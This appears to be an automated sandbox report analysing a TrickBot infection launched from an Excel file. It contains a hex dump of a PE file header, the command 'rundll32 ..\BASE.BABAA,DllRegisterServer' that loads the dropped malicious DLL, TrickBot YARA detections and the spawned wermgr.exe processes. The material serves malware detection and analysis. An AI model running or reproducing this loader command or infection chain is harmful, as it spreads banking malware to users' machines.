                                                                                                                                                                                                                                          Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc b8
                                                                                                                                                                                                                                          Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


                                                                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Start time:02:12:30
                                                                                                                                                                                                                                          Start date:20/02/2021
                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                                          Imagebase:0x1250000
                                                                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Start time:02:13:16
                                                                                                                                                                                                                                          Start date:20/02/2021
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                                                                          Imagebase:0x11c0000
                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 0000000E.00000003.304386542.0000000000E7F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 0000000E.00000002.308987556.0000000004840000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 0000000E.00000003.304304596.0000000004935000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 0000000E.00000002.309036588.00000000048D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 0000000E.00000003.304224445.0000000000E07000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 0000000E.00000003.304290876.0000000000E7F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 0000000E.00000003.304101028.00000000048D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Start time:02:13:18
                                                                                                                                                                                                                                          Start date:20/02/2021
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                                                                          Imagebase:0x7ff7ca4e0000
                                                                                                                                                                                                                                          File size:209312 bytes
                                                                                                                                                                                                                                          MD5 hash:FF214585BF10206E21EA8EBA202FACFD
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Start time:02:13:18
                                                                                                                                                                                                                                          Start date:20/02/2021
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                                                                          Imagebase:0x7ff7ca4e0000
                                                                                                                                                                                                                                          File size:209312 bytes
                                                                                                                                                                                                                                          MD5 hash:FF214585BF10206E21EA8EBA202FACFD
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                                                                          Reset < >